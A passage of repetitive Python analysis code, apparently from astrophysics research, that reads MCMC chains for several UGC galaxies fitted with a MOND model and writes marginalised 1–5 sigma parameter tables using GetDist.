text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC08286
low=log10_YD_sol_UGC08286-stats_UGC08286.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC08286.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC08286
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC08286
low=df2_sol_UGC08286-stats_UGC08286.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC08286.parWithName('df2').limits[i].upper- df2_sol_UGC08286
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC08286
low=Dinc_sol_UGC08286-stats_UGC08286.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC08286.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC08286
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC08490 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08490.csv',usecols=[1,2,3,4])
data_array_chain_UGC08490 = numpy.array(full_chain_UGC08490)
mle_soln_UGC08490=[]
for i in range(ndim):
mcmc_UGC08490 = numpy.percentile(data_array_chain_UGC08490[:, i], [16, 50, 84])
q_UGC08490 = numpy.diff(mcmc_UGC08490)
mle_soln_UGC08490.append(mcmc_UGC08490[1])
log10_a0_sol_UGC08490=mle_soln_UGC08490[0]
log10_YD_sol_UGC08490=mle_soln_UGC08490[1]
df2_sol_UGC08490=mle_soln_UGC08490[2]
Dinc_sol_UGC08490=mle_soln_UGC08490[3]
samp_UGC08490 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08490,names = names, labels = labels)
samp_UGC08490.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC08490 = samp_UGC08490.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC08490
low=log10_a0_sol_UGC08490-stats_UGC08490.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC08490.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC08490
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC08490
low=log10_YD_sol_UGC08490-stats_UGC08490.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC08490.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC08490
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC08490
low=df2_sol_UGC08490-stats_UGC08490.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC08490.parWithName('df2').limits[i].upper- df2_sol_UGC08490
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC08490
low=Dinc_sol_UGC08490-stats_UGC08490.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC08490.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC08490
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC08550 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08550.csv',usecols=[1,2,3,4])
data_array_chain_UGC08550 = numpy.array(full_chain_UGC08550)
mle_soln_UGC08550=[]
for i in range(ndim):
mcmc_UGC08550 = numpy.percentile(data_array_chain_UGC08550[:, i], [16, 50, 84])
q_UGC08550 = numpy.diff(mcmc_UGC08550)
mle_soln_UGC08550.append(mcmc_UGC08550[1])
log10_a0_sol_UGC08550=mle_soln_UGC08550[0]
log10_YD_sol_UGC08550=mle_soln_UGC08550[1]
df2_sol_UGC08550=mle_soln_UGC08550[2]
Dinc_sol_UGC08550=mle_soln_UGC08550[3]
samp_UGC08550 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08550,names = names, labels = labels)
samp_UGC08550.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC08550 = samp_UGC08550.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC08550
low=log10_a0_sol_UGC08550-stats_UGC08550.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC08550.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC08550
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC08550
low=log10_YD_sol_UGC08550-stats_UGC08550.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC08550.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC08550
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC08550
low=df2_sol_UGC08550-stats_UGC08550.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC08550.parWithName('df2').limits[i].upper- df2_sol_UGC08550
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC08550
low=Dinc_sol_UGC08550-stats_UGC08550.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC08550.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC08550
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC08699 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08699.csv',usecols=[1,2,3,4,5])
data_array_chain_UGC08699 = numpy.array(full_chain_UGC08699)
mle_soln_UGC08699=[]
for i in range(ndim_with_bulge):
mcmc_UGC08699 = numpy.percentile(data_array_chain_UGC08699[:, i], [16, 50, 84])
q_UGC08699 = numpy.diff(mcmc_UGC08699)
mle_soln_UGC08699.append(mcmc_UGC08699[1])
log10_a0_sol_UGC08699=mle_soln_UGC08699[0]
log10_YD_sol_UGC08699=mle_soln_UGC08699[1]
log10_YB_sol_UGC08699=mle_soln_UGC08699[2]
df2_sol_UGC08699=mle_soln_UGC08699[3]
Dinc_sol_UGC08699=mle_soln_UGC08699[4]
samp_UGC08699 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08699,names = names_with_bulge, labels = labels_with_bulge)
samp_UGC08699.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC08699 = samp_UGC08699.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC08699
low=log10_a0_sol_UGC08699-stats_UGC08699.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC08699.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC08699
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC08699
low=log10_YD_sol_UGC08699-stats_UGC08699.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC08699.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC08699
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_YB.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YB_sol_str='%s'%log10_YB_sol_UGC08699
low=log10_YB_sol_UGC08699-stats_UGC08699.parWithName('log10_YB').limits[i].lower
low_str='%s'%low
up=stats_UGC08699.parWithName('log10_YB').limits[i].upper- log10_YB_sol_UGC08699
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_YB.txt', 'a')
text_file.write(log10_YB_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC08699
low=df2_sol_UGC08699-stats_UGC08699.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC08699.parWithName('df2').limits[i].upper- df2_sol_UGC08699
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC08699
low=Dinc_sol_UGC08699-stats_UGC08699.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC08699.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC08699
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC08837 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08837.csv',usecols=[1,2,3,4])
data_array_chain_UGC08837 = numpy.array(full_chain_UGC08837)
mle_soln_UGC08837=[]
for i in range(ndim):
mcmc_UGC08837 = numpy.percentile(data_array_chain_UGC08837[:, i], [16, 50, 84])
q_UGC08837 = numpy.diff(mcmc_UGC08837)
mle_soln_UGC08837.append(mcmc_UGC08837[1])
log10_a0_sol_UGC08837=mle_soln_UGC08837[0]
log10_YD_sol_UGC08837=mle_soln_UGC08837[1]
df2_sol_UGC08837=mle_soln_UGC08837[2]
Dinc_sol_UGC08837=mle_soln_UGC08837[3]
samp_UGC08837 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08837,names = names, labels = labels)
samp_UGC08837.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC08837 = samp_UGC08837.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC08837
low=log10_a0_sol_UGC08837-stats_UGC08837.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC08837.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC08837
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC08837
low=log10_YD_sol_UGC08837-stats_UGC08837.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC08837.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC08837
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC08837
low=df2_sol_UGC08837-stats_UGC08837.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC08837.parWithName('df2').limits[i].upper- df2_sol_UGC08837
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC08837
low=Dinc_sol_UGC08837-stats_UGC08837.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC08837.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC08837
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC09037 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC09037.csv',usecols=[1,2,3,4])
data_array_chain_UGC09037 = numpy.array(full_chain_UGC09037)
mle_soln_UGC09037=[]
for i in range(ndim):
mcmc_UGC09037 = numpy.percentile(data_array_chain_UGC09037[:, i], [16, 50, 84])
q_UGC09037 = numpy.diff(mcmc_UGC09037)
mle_soln_UGC09037.append(mcmc_UGC09037[1])
log10_a0_sol_UGC09037=mle_soln_UGC09037[0]
log10_YD_sol_UGC09037=mle_soln_UGC09037[1]
df2_sol_UGC09037=mle_soln_UGC09037[2]
Dinc_sol_UGC09037=mle_soln_UGC09037[3]
samp_UGC09037 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC09037,names = names, labels = labels)
samp_UGC09037.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC09037 = samp_UGC09037.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC09037
low=log10_a0_sol_UGC09037-stats_UGC09037.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC09037.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC09037
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC09037
low=log10_YD_sol_UGC09037-stats_UGC09037.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC09037.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC09037
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC09037
low=df2_sol_UGC09037-stats_UGC09037.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC09037.parWithName('df2').limits[i].upper- df2_sol_UGC09037
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC09037
low=Dinc_sol_UGC09037-stats_UGC09037.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC09037.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC09037
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC09133 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC09133.csv',usecols=[1,2,3,4,5])
data_array_chain_UGC09133 = numpy.array(full_chain_UGC09133)
mle_soln_UGC09133=[]
for i in range(ndim_with_bulge):
mcmc_UGC09133 = numpy.percentile(data_array_chain_UGC09133[:, i], [16, 50, 84])
q_UGC09133 = numpy.diff(mcmc_UGC09133)
mle_soln_UGC09133.append(mcmc_UGC09133[1])
log10_a0_sol_UGC09133=mle_soln_UGC09133[0]
log10_YD_sol_UGC09133=mle_soln_UGC09133[1]
log10_YB_sol_UGC09133=mle_soln_UGC09133[2]
df2_sol_UGC09133=mle_soln_UGC09133[3]
Dinc_sol_UGC09133=mle_soln_UGC09133[4]
samp_UGC09133 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC09133,names = names_with_bulge, labels = labels_with_bulge)
samp_UGC09133.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC09133 = samp_UGC09133.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC09133
low=log10_a0_sol_UGC09133-stats_UGC09133.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC09133.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC09133
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC09133
low=log10_YD_sol_UGC09133-stats_UGC09133.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC09133.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC09133
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_YB.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YB_sol_str='%s'%log10_YB_sol_UGC09133
low=log10_YB_sol_UGC09133-stats_UGC09133.parWithName('log10_YB').limits[i].lower
low_str='%s'%low
up=stats_UGC09133.parWithName('log10_YB').limits[i].upper- log10_YB_sol_UGC09133
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-log10_YB.txt', 'a')
text_file.write(log10_YB_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC09133
low=df2_sol_UGC09133-stats_UGC09133.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC09133.parWithName('df2').limits[i].upper- df2_sol_UGC09133
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC09133
low=Dinc_sol_UGC09133-stats_UGC09133.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC09133.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC09133
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09133-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC09992 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC09992.csv',usecols=[1,2,3,4])
data_array_chain_UGC09992 = numpy.array(full_chain_UGC09992)
mle_soln_UGC09992=[]
for i in range(ndim):
mcmc_UGC09992 = numpy.percentile(data_array_chain_UGC09992[:, i], [16, 50, 84])
q_UGC09992 = numpy.diff(mcmc_UGC09992)
mle_soln_UGC09992.append(mcmc_UGC09992[1])
log10_a0_sol_UGC09992=mle_soln_UGC09992[0]
log10_YD_sol_UGC09992=mle_soln_UGC09992[1]
df2_sol_UGC09992=mle_soln_UGC09992[2]
Dinc_sol_UGC09992=mle_soln_UGC09992[3]
samp_UGC09992 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC09992,names = names, labels = labels)
samp_UGC09992.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC09992 = samp_UGC09992.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC09992
low=log10_a0_sol_UGC09992-stats_UGC09992.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC09992.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC09992
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC09992
low=log10_YD_sol_UGC09992-stats_UGC09992.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC09992.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC09992
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC09992
low=df2_sol_UGC09992-stats_UGC09992.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC09992.parWithName('df2').limits[i].upper- df2_sol_UGC09992
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC09992
low=Dinc_sol_UGC09992-stats_UGC09992.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC09992.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC09992
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09992-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC10310 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC10310.csv',usecols=[1,2,3,4])
data_array_chain_UGC10310 = numpy.array(full_chain_UGC10310)
mle_soln_UGC10310=[]
for i in range(ndim):
mcmc_UGC10310 = numpy.percentile(data_array_chain_UGC10310[:, i], [16, 50, 84])
q_UGC10310 = numpy.diff(mcmc_UGC10310)
mle_soln_UGC10310.append(mcmc_UGC10310[1])
log10_a0_sol_UGC10310=mle_soln_UGC10310[0]
log10_YD_sol_UGC10310=mle_soln_UGC10310[1]
df2_sol_UGC10310=mle_soln_UGC10310[2]
Dinc_sol_UGC10310=mle_soln_UGC10310[3]
